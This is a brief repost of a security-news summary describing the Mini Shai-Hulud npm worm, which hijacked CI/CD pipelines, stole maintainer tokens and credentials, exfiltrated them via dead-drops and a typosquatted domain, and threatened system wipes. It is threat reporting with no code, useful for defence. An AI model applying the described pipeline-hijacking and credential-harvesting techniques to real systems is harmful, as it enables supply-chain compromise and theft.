(guardz.com) Mini Shai-Hulud: Self-Propagating Worm Compromises npm Ecosystem via CI/CD Pipeline Hijacking
-
(guardz.com) Mini Shai-Hulud: Self-Propagating Worm Compromises npm Ecosystem via CI/CD Pipeline Hijacking
Mini Shai-Hulud worm (TeamPCP) compromised 200+ npm packages via CI/CD hijacking, targeting TanStack, Mistral AI, and others. Attack executed at install time, bypassing SLSA provenance and harvesting credentials from dev workstations/cloud environments. Destructive persistence triggered on token revocation.
In brief - A self-propagating npm worm attributed to TeamPCP leveraged stolen tokens and GitHub Actions abuse to compromise 200+ packages, exfiltrating credentials via dead-drops and threatening system wipes. Critical gaps in SLSA provenance and package signing enabled the attack.
Technically - Mini Shai-Hulud exploited `pull_request_target` workflows, cache poisoning, and OIDC token extraction to inject malicious `router_init.js` payloads at install time. The 2.xMB obfuscated JS targeted 100+ credential paths (GitHub/npm tokens, cloud creds, Kubernetes configs) across macOS/Linux/Windows. Exfiltration used Session Protocol, GitHub GraphQL dead-drops, and a typosquatted domain (`git-tanstack.com`). Persistence via systemd/LaunchAgents and IDE hooks, with destructive triggers tied to token revocation. Propagation scaled by infecting all packages owned by compromised maintainers.
-
R relay@relay.infosec.exchange shared this topic
